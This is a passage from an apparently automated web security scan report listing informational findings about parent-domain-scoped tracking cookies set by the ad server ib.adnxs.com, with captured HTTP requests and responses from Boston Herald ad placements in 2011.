The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-48597195_1296251864%2C11d765b6a10b1b3%2CMiscellaneous%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D199062%3Bcontx%3DMiscellaneous%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.3579352851957083%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG3H<fQCe7?0P(*AuB-u**g1:XIC(WUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy6A3fm`:Idk3X!(*W2F2Hk''SykpRE%:434AnQ9O>WxYDWB13NOp+/5AIyhgU6ROEcF@:XJvR6qJ:uuL`8Q2Vw2t![$ph'S1S['D+Ir$>37Xp$KdW'FoQ)MSzM(Q66u2x%X_(L:Sjx('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o>Pj9!*^

Response

10.76. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly
acb437727=5_[r^208WMuF4Lw)IE.8pxVr8?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP-1RhKNLepg-BWHfHSmrEEKtRENNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEpggBAgUCAAIAAAAA6SF9GAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296254125%29%3Buf%28%27r%27%2C+151403%2C+1296254125%29%3Bppv%2882%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2884%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2811%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2882%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2884%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2887%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28619%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28620%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28621%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb510504=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb437727=5_[r^208WMuF4Lw)IE.8pxVr8?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP-1RhKNLepg-BWHfHSmrEEKtRENNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEpggBAgUCAAIAAAAA6SF9GAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296254125%29%3Buf%28%27r%27%2C+151403%2C+1296254125%29%3Bppv%2882%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2884%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2811%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2882%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2884%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2887%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28619%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28620%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28621%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 22:35:25 GMT
Content-Length: 834

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-83450342_1296254125,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.77. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:49 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:49 GMT; domain=.adnxs.com; HttpOnly
acb208574=5_[r^208WMM2x@N!@@-#jWrqQ?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEPzzOLJCC5ShcBWHfHSmrEEKZcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEFwkBAgUCAAIAAAAAPyIyOwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265369%29%3Buf%28%27r%27%2C+116344%2C+1296265369%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:49 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:49 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:49 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.78. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:23 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:23 GMT; domain=.adnxs.com; HttpOnly
acb988380=5_[r^208WMM2x@N!@@-#b8Y/6?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP7E_zwhd9VhuBWHfHSmrEEJ_cENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE-gYBAgUCAAIAAAAAMyO8VAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265343%29%3Buf%28%27r%27%2C+116344%2C+1296265343%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:23 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:23 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:23 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-85794731_1296251888%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D262895%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.33319127024151385%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; icu=EAAYAA..; acb217792=5_[r^208WMuF4Lw)IE.8._w.i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8xSvlfRzDIuBWHfHSmrEELlO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQElgQBAgUCAAIAAAAANCJDNAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251877%29%3Buf%28%27r%27%2C+151403%2C+1296251877%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2811%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2887%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28619%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28620%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28621%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

10.79. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly
acb64287=5_[r^208WMrO@Pn)IE.8.%R'i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxBYVBc7kOUMBWHfHSmrEELjPUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEBQkBAgUCAAIAAAAAByCzmwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252387%29%3Buf%28%27r%27%2C+151403%2C+1296252387%29%3Bppv%2882%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2884%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2811%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2882%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2884%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2887%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28619%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28620%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28621%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb119885=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb64287=5_[r^208WMrO@Pn)IE.8.%R'i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxBYVBc7kOUMBWHfHSmrEELjPUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEBQkBAgUCAAIAAAAAByCzmwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252387%29%3Buf%28%27r%27%2C+151403%2C+1296252387%29%3Bppv%2882%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2884%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2811%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2882%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2884%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2887%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28619%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28620%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28621%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 22:06:27 GMT
Content-Length: 742

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-98462601_1296252387,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.80. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly
